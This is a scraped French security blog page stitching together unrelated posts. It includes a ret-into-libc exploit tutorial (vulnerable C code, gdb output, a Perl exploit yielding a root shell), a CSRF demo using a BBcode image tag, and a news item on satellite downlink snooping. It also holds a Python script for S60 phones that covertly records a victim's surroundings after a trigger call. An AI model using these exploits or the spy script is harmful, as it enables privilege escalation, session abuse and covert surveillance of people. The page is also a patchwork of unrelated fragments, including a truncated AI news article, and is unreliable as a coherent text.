Merci à Korigan pour sa relecture

Shiney

Who Uses Network Scanning?
System administrators, network engineers, auditors,… all use network scanners for following
reasons :
> Security auditing
>Compliance testing
> Asset management
> Network and system inventory

Full version

Author: J0k3r

Ret into libc

   Je vais décrire brièvement comment exploiter un programme en utilisant la méthode de ret into libc.
   Ceci a été testé uniquement sur FreeBSD 8.1, sans ASLR, et sans SSP d'activé.

   Prenons le programme vulnérable suivant :


   #include
   #include 

   void foo(char *buff)
   {
      char buffer[100];
      strcpy(buffer, buff);
   }
   int main(int argc, char **argv)
   {
      if(argc != 2)
      {
         printf("Usage : %s \n", argv[0]);
         return 0;
      }
      foo(argv[1]);
      return 0;
   }


   Nous avons donc un stack overflow dans la fonction foo. Nous savons que nous écrasons EBP
   après 100 caractères copiés, et EIP après 104 caractères.

   Pour être sûr, testons :

   (gdb) r `perl -e 'print "A"x100 . "BBBB" . "CCCC";'`
   Program received signal SIGSEGV, Segmentation fault.
   0x43434343 in ?? ()
   (gdb) i r ebp eip
   ebp            0x42424242	0x42424242
   eip            0x43434343	0x43434343

   Nous avons donc bien écrasé EBP avec les 'B' et EIP avec les 'C'.

   Le principe du ret into libc, est qu'au lieu de jumper sur un shellcode en STACK ou présent dans une
   variable d'environnement, nous jumpons sur une fonction de la bibliothèque C.

   Le plus simple, étant de sauter sur la fonction system, nous pourrons alors exécuter la commande de notre
   choix.

   Pour se faire, il faudra écraser EIP, avec l'addresse de la fonction system située dans le programme
   vulnérable, en lui transmettant l'addresse où sera situé notre chaine à exécuter.

   En connaissant un peu comment fonctionne les appels de fonctions en C, nous savons que system() ira
   chercher l'addresse de la chaine 4 octets plus haut sur la pile au moment de l'appel, le sommet de la pile
   étant EIP empilé par l'instruction CALL.

   Une manière propre de faire, étant de placer l'addresse de exit entre l'addresse de system() (Qui écrase EIP), et l'addresse de notre
   commande. Ainsi, le programme fermera proprement au retour de la fonction system. (Car system jumpera sur l'adresse située
   sur le sommet de la pile, pensant qu'elle a été appellée grâce à l'instruction CALL)

   Notre stack ressemblera donc à ceci :

   [     BUFFER     ]
   [     BUFFER     ]
   [      ...       ]
   [     BUFFER     ]
   [ Adresse system ]
   [  Adresse exit  ]
   [Adresse commande]
   [   Commande     ]
   [   Commande     ]
   [   Commande     ]

   Pourquoi mettre la chaîne de l'argument de system APRÈS les adresses, et pas dans le buffer ?
   Car cette chaîne a besoin du caractère final '\0', hors si on le met au début, strcpy arrêtera la copie,
   et nous ne pourrons pas exploiter notre programme.

   Le risque, étant d'écraser des données utiles à l'exploitation.

   Récupérons les adresses de system et exit :

   [tosh@sys-tosh /usr/home/tosh/Desktop]$ gdb vuln
   GNU gdb 6.1.1 [FreeBSD]
   Copyright 2004 Free Software Foundation, Inc.
   GDB is free software, covered by the GNU General Public License, and you are
   welcome to change it and/or distribute copies of it under certain conditions.
   Type "show copying" to see the conditions.
   There is absolutely no warranty for GDB.  Type "show warranty" for details.
   This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols found)...
   (gdb) b main
   Breakpoint 1 at 0x8048470
   (gdb) r
   Breakpoint 1, 0x08048470 in main ()
   (gdb) x exit
   0x28101920 :	0x53e58955
   (gdb) x system
   0x280ad870 :	0x0001b855

   Nous avons donc :
      system : 0x280ad870
      exit   : 0x28101920

   Le plus dur, reste de trouver l'adresse de la chaine.

   Exécutons le programme, et tentons de trouver le début de la chaîne :

   (gdb) r `perl -e 'print "A"x108 . "BBBB";'`
   Program received signal SIGSEGV, Segmentation fault.
   0x41414141 in ?? ()
   (gdb) i r $esp
   esp            0xbfbfe9c0	0xbfbfe9c0
   (gdb) x/s $esp
   0xbfbfe9c0:	 "BBBB"

   Nous avons notre chaîne !
   Avec le shéma de la stack précédente, nous savons que notre chaine sera située 8 octets plus loin
   dans la stack, soit a l'adresse 0xbfbfe9c8

   Nous pouvons donc écrire notre exploit :


   #!/usr/bin/perl
   use strict;

   my $system_addr = "\x70\xd8\x0a\x28";
   my $exit_addr = "\x20\x19\x10\x28";
   my $cmd_addr = "\xc8\xe9\xbf\xbf";
   my $cmd = "/bin/sh";

   my $buff = ("A"x104) . ($system_addr). $exit_addr. $cmd_addr.$cmd;

   print "[*] Inj3ct code...\n";

   exec("./vuln", $buff) || die("Can't exec file\n");


   Comme vous le savez, sur un système LITTLE_ENDIAN, il faut écrire les adresses "à l'envers", les octets
   de poids faibles étant à gauche, et ceux de poids fort à droite.

   Lançons l'exploit :

   [tosh@sys-tosh /usr/home/tosh/Desktop]$ perl test.pl
   [*] Inj3ct code...
   # id
   uid=1001(tosh) gid=1001(tosh) euid=0(root) groups=1001(tosh),0(wheel)
   #

   Et voilà   .
Conclusion :

L'avantage de cette technique, est en premier lieu de contourner les protections sur la stack
   non exécutable, et qu'elle fonctionne sans shellcode.

   Pis elle est fun je trouve   .

Xavier de la Porte, producteur de l’émission Place de la Toile sur France Culture, réalise chaque semaine une lecture d’un article de l’actualité dans le cadre de son émission.

La lecture de la semaine, il s’agit d’un article du New York Times, dernier article en date d’une série consacrée à l’intelligence artificielle et à ses impacts potentiels sur la société. Celui que j’ai choisi de traduire concerne l’apprentissage du langage par la machine, un enjeu essentiel dans le cadre de ce qu’on appelle depuis quelques années déjà le web sémantique.

En partenariat avec

Cet article a été publié à l’origine sur Internetactu.net.

Les derniers articles d’Internetactu

• Pourquoi l’Internet n’a-t-il pas changé la politique ?
• Vieillissement et nouvelles technologies : un rendez-vous manqué
• Un monde de technologies centré sur l’utilisateur
  
• Innovation sociale : écoutons ces idées !
  
• “Nous sommes notre propre technologie”
  

Sur le même sujet

Entretien Pourquoi l’Internet n’a-t-il pas changé la politique ?

Zoom Troisième âge et nouvelles technologies, un rendez-vous manqué

Zoom La montée de la consommation collaborative

Zoom Quelques défis pour la prochaine décennie

Entretien “Le Web ne désocialise pas plus qu’il n’hypersocialise”

Zoom Technostalgie… ou pas

Eclairage Ce qu’il y a de bon dans la déconnexion

L’article commence par rappeler que si l’on donne à un ordinateur une tâche qui est clairement définie – comme gagner aux échecs ou prédire le temps qu’il fera demain – la machine dépasse l’homme de manière presque systématique. Mais quand les problèmes comportent des nuances et des ambiguïtés, ou qu’ils exigent de combiner plusieurs sources d’information, les ordinateurs n’égalent pas l’intelligence humaine.

Parmi ces problèmes compliqués à résoudre pour l’ordinateur, il y a évidemment la compréhension du langage. Une des raisons de la complexité qu’il y a à comprendre le langage est que le sens des mots et des phrases ne dépend pas seulement de leur contexte, mais aussi d’une connaissance que les êtres humains acquièrent au fil de leur vie.

Or, nous apprend l’article, depuis le début de l’année, une équipe de chercheurs de l’université de Carnegie Mellon est en train d’élaborer un système informatique qui tente d’apprendre la sémantique à la manière d’un être humain, c’est-à-dire “de manière cumulative, et sur le long terme”, comme l’explique Tom Mitchell, qui dirige le projet. Cette machine – qui calcule 24 heures sur 24 et 7 jours sur 7 – est abritée dans le centre informatique de cette université de Pittsburgh. Les chercheurs l’ont doté d’une connaissance de base et, depuis 10 mois, elle est lâchée sur le web avec la mission de s’y instruire par elle-même.

Ce système s’appelle NELL, acronyme de Never ending Language Learning System. Et d’après le journaliste du New York Times, Steve Lhor, jusqu’ici, les résultats sont impressionnants. NELL scanne des millions de pages Web dont il fait des textes-modèles qu’il utilise pour apprendre des faits. En quelques mois, il a appris 390 000 faits, avec une exactitude estimée à 87 %. Ces faits sont regroupés dans différentes catégories sémantiques : villes, entreprises, équipes de sport, acteurs, universités, plantes, et 274 autres. Dans chaque catégorie, les faits appris sont des choses comme “San Francisco est une ville” ou “le tournesol est une plante”.

NELL apprend aussi des faits qui sont des relations entre les membres de deux catégories différentes. Par exemple : “Peyton Manning est un joueur de foot”. “Les Colts d’Indianapolis est une équipe de foot”. En scannant des textes-modèles, NELL peut en déduire avec un fort taux de probabilité que Peyton Manning joue pour les Colts d’Indianapolis – même s’il n’a jamais lu que Peyton Manning joue pour les Colts. “Jouer pour” est une relation, il en existe 280 autres dans le programme. Le nombre de catégories et de relations a plus que doublé depuis le début de l’année, et il est en expansion constante.

Les faits appris sont continuellement ajoutés dans la base de données de NELL, que les chercheurs ont appelée base de connaissance. Selon Tom Mitchell, plus le nombre de faits appris sera important, plus il sera possible d’affiner l’algorithme d’apprentissage de NELL, de sorte qu’il augmente son efficacité et la précision de ses recherches de faits sur le Web.

BASE DE CONNAISSANCE

Les chercheurs ont commencé par construire une base de connaissance, remplissant chaque type de catégorie ou de relation avec une quinzaine d’exemples avérés. Dans la catégorie des émotions, par exemple : “la colère est une émotion”, “la félicité est une émotion”, et une douzaine d’autres faits. Ensuite, NELL part au travail. Ses outils incluent des programmes qui extraient et classifient des phrases rencontrées sur le Web, des programmes qui cherchent des modèles et des corrélations, et des programmes qui apprennent les règles.

Par exemple, quand le système lit “Mont Ventoux” (j’ai francisé), il étudie la structure : deux mots, chacun commençant par une majuscule, et le premier mot est “Mont”. Cette structure suffit à rendre probable le fait que le “Mont Ventoux” soit une montagne. Mais NELL lit aussi de plusieurs manières. Il exploitera aussi des phrases qui entourent “Mont Ventoux” et des syntagmes nominaux qui reviennent dans un contexte semblable. Par exemple “J’ai grimpé X”.

NELL, explique Tom Mitchell, est conçu pour être capable d’examiner des mots dans des contextes différents, en parcourant une échelle de règles lui servant à résoudre l’ambiguïté. Par exemple, la phrase “J’ai grimpé X”, apparaît souvent suivie du nom d’une montagne. Mais quand NELL lit “J’ai grimpé les escaliers”, il a d’abord appris avec une quasi-certitude que le mot “escaliers” appartient à la catégorie “élément de construction”. Il se corrige à mesure qu’il a plus d’information, à mesure qu’il a plus appris.

1 | 2 | suivant

Aujourd’hui, nous allons exploiter une faille de type csrf ( Cross-site request forgery ) . Ce type d’attaque permet à un attaquant de faire exécuter des requêtes spécialement forgées  via le navigateur d’une victime.

Dans cet article, nous prendrons pour exemple un forum phpBB3 et tenterons de déconnecter de facebook la personne qui reçoit notre message privé.

Le lien suivant permet de se déconnecter de facebook:  http://m.facebook.com/logout.php

Nous allons donc sur notre site phpBB3 envoyer un message privé à notre victime (moi même dans notre exemple) et allons essayer de lui faire exécuter notre url  en la mettant dans un BBcode image: [img]http://m.facebook.com/logout.php[img].

Notre victime est connecté sur facebook:

Elle recoit notre message:

Et elle se retrouve déconnecté de facebook:

Dans cette démonstration, l’exploitation de la csrf est limité à des méthodes GET. Cependant, elle est très facile à mettre en œuvre et nous permet d’exécuter des requêtes avec les cookies de la victime. Le BBcode est extrêmement répandu notamment dans les forum, elles peuvent apparaitre dans la signature d’un utilisateur par exemple et ainsi toucher un grand nombre de visiteurs en toute discrétion. Enfin, même si des filtres sont mis en place pour empêcher d’exploiter les csrf dans des BBcodes images, il est toujours possible de l’exploiter même en y appliquant le lien d’une image.

Shiney

En route vers Prologin 2011 !

L’édition 2011 a enfin débuté, alors ne perdez plus de temps, à vos claviers !
Vous avez jusqu’au Dimanche 2 janvier 2011 pour valider le questionnaire de sélection.

Accueil | Prologin.

L’écoute des liaisons montantes des satellites de télédiffusion, le piratage des cartes de déchiffrement (les infâmes codes season qui permettaient d’accéder gratuitement au réseau Sky), tout çà est assez classique et presque banal.
L’attaque en déni de service à la réception demande un peu plus d’inventivité. Le hold-up de satellite par « écrasement » (hétérodynage, disent les spécialistes) de l’uplink officiel exige également quelques moyens peu courants, mais que toute nation se doit de posséder en cas de conflit.
Le « radio squatting » de canaux satellites (à l’insu du propriétaire de l’oiseau), voilà qui est encore moins banal. Il consiste à utiliser, sans débourser un centime, les fréquences laissées libres sur le transpondeur embarqué. Encore faut-il posséder l’équivalent d’une station terrestre pour atteindre le véhicule en orbite géosynchrone. Mais le meilleur du hacking semble bien être l’espionnage des liaisons descendantes des réseaux informatiques véhiculés soit par Vsat, soit par « broadcast général et accès séquentiel » tel que le pratiquent les fournisseurs d’accès Internet par satellite.

Tout ceci fera l’objet d’une causerie d’Adam Laurie, le patron du Bunker, pourfendeur de RFID, à l’occasion de la prochaine BlackHat de Washington. Sam Goodin, du Reg, signale également l’événement et rappelle que déjà, à l’occasion de la dernière Hack in the Box 2008, trois chercheurs Jim Geovedi, Raditya Iryandi et Anthony Zboralski, avaient décrit comment squatter un canal inutilisé sur un satellite de retransmission civile ou, -technique bien plus simple et efficace- comment « planter » ledit réseau en lançant une attaque en déni de service purement radioélectrique côté réception. Il faut admettre que cette forme d’attaque brutale ou de wardriving suivi d’une injection de « rogue station » dépasse quelque peu en moyens techniques ce qu’il est nécessaire de posséder dans le domaine du Wifi. Mais la chose ne présente aucune difficulté insurmontable pour un bon radioélectronicien.

Mais revenons à Laurie. Son hack est diablement intéressant pour plusieurs raisons. En premier lieu, il ne s’attaque qu’au contenu des liaisons descendantes. De ce fait, il peut se contenter d’utiliser un simple démodulateur et une antenne offset tout à fait classique qui ne dépare pas dans le paysage urbain moderne. C’est un détail important. Car le « piratage de canal » suggéré par l’étude de Geovedi-Iryandi-Zboralski nécessite une antenne relativement « pointue » et présentant un gain énorme… donc une taille proportionnelle au gain espéré. Un réflecteur parabolique de 2 à 4 mètres ailleurs que sur le toit d’un hôtel passe rarement inaperçu. Ceci sans mentionner les considérations économiques : une station d’attaque devant émettre coûte plusieurs milliers d’euros, un système d’écoute passif peut être acquis pour une cinquantaine d’euros, neuf, dans n’importe quelle grande surface de bricolage, au rayon « antennes et TV satellite ».
Comble de la simplicité, les démodulateurs modernes possèdent désormais tous une interface Ethernet, et bien souvent un firmware à base de Linux embarqué. Il n’est donc plus nécessaire de s’inquiéter d’éventuelles contraintes matérielles : même sans fer à souder, il est aujourd’hui possible de voir passer les requêtes Gmail ou les navigations Web qui passent par les « downlink » grand public. Ce n’est plus qu’une question de connaissance des sniffers en vogue et éventuellement de quelques programmes de déchiffrement.

Le hack des satellites est un vieux mythe de la SF moderne. L’un des premiers auteurs à en avoir mentionné quelques aperçus techniques plausibles était Jacques Vallée, dans son roman Alintel. Déjà, à l’époque, l’écoute des « uplink » était un sport pour quelques rares hackers travaillant dans le domaine de l’analogique. Après le petit exercice de vulgarisation auquel va se mener Adam Laurie –et compte tenu de l’acharnement de ce dernier à fournir l’intégralité de ses outils en open source- il y a fort à parier que les adeptes du wardriving spatial vont se multiplier. Insistons toutefois sur deux ou trois petits détails qui pourraient tempérer les ardeurs de certains. Les « downlink Internet », Vsat mis à part, ne sont jamais qu’une forme plus rapide du système pseudo-interactif Antiope (les informations videotext diffusées dans l’espace de synchro des trames de la télévision terrestre). Les données descendantes de centaines d’internautes sont expédiées « pêle-mêle » depuis le satellite dans une sorte de mode broadcast légèrement redondant. Seul un identifiant permet à chacun de ne filtrer que ce qui l’intéresse… mais tout le monde reçoit les informations de tout le monde. Ce qui implique qu’il faille sérieusement trier ce que l’on recherche à l’arrivée.

Autre problème, il est très difficile –mais pas impossible- d’effectuer une attaque par « cookie hijacking » pour récupérer, par exemple, une interface Gmail. Tout l’art est de pouvoir atteindre la station de travail, et, en premier lieu, de la repérer et de la surveiller par le biais de sa voie « montante ». Cette voie expédie les ordres vers les proxys de l’opérateur satellite, et est généralement constituée d’une simple liaison IP par RTC ou par ADSL. Ces « voies montantes » sont bidirectionnelles, et donc susceptibles d’attaques par injection. La surveillance de l’adresse IP fait le reste… ou presque.

Le hack des satellites, un classique qui revient à la mode – CNIS mag.

Une fois installé, ce script répond à un appel et enregistre le bruit ambiant sans intervention de la victime.

import appuifw

import e32
import logs
import audio
import telephone
from e32db import format_time
from time import *

def recording():
try:
global S
formatted_time = format_time(time()).replace(‘:’,”).replace(‘/’,”).replace(‘ ‘,”)
filename = u’e:\\kuku_recording_’ + formatted_time + ‘.wav’
S=audio.Sound.open(filename)
S.record()
print u’Recording ‘ + filename
except:
print ‘Error.’

def handleCall((callState, number)):
#callerNum = c.get()
global callerOK
global caller

if callState == telephone.EStatusRinging :
if number == caller :
print u’Caller (‘ + number + ‘) recognized, waiting for hanging up…’
callerOK = 1
else :
print u’(‘ + number + ‘) unknown caller.’
callerOK = 0
elif callState == telephone.EStatusDisconnecting :
print u’Disconnecting…’
if callerOK == 1 :
recording()

def closing():
try:
global S
S.stop()
S.close()
print u’Stopped.’
except:
print u’Nothing to stop.’

def quit():
script_lock.signal()
# appuifw.app.set_exit()

appuifw.app.exit_key_handler = quit
appuifw.app.menu = [(u"Stop", closing)]
appuifw.app.title = u’KuKu!’
#c = appuifw.Text()
#appuifw.app.body = c

print u’KuKu! – (c) J@mBeL.net’
global caller
caller = appuifw.query(u’Enter phone number: ‘, ‘text’)
telephone.call_state(handleCall)

script_lock = e32.Ao_lock()
script_lock.wait()

Pour information, jambelnet à réalisé un mini howto expliquant comment transformer vos scripts python en application pour symbian OS (cf http://jambelnet.blogspot.com/search/label/Mobile)

Plus d’informations à cette adresse: http://jambelnet.blogspot.com/2008/06/spy-phone-python-script-for-s60.html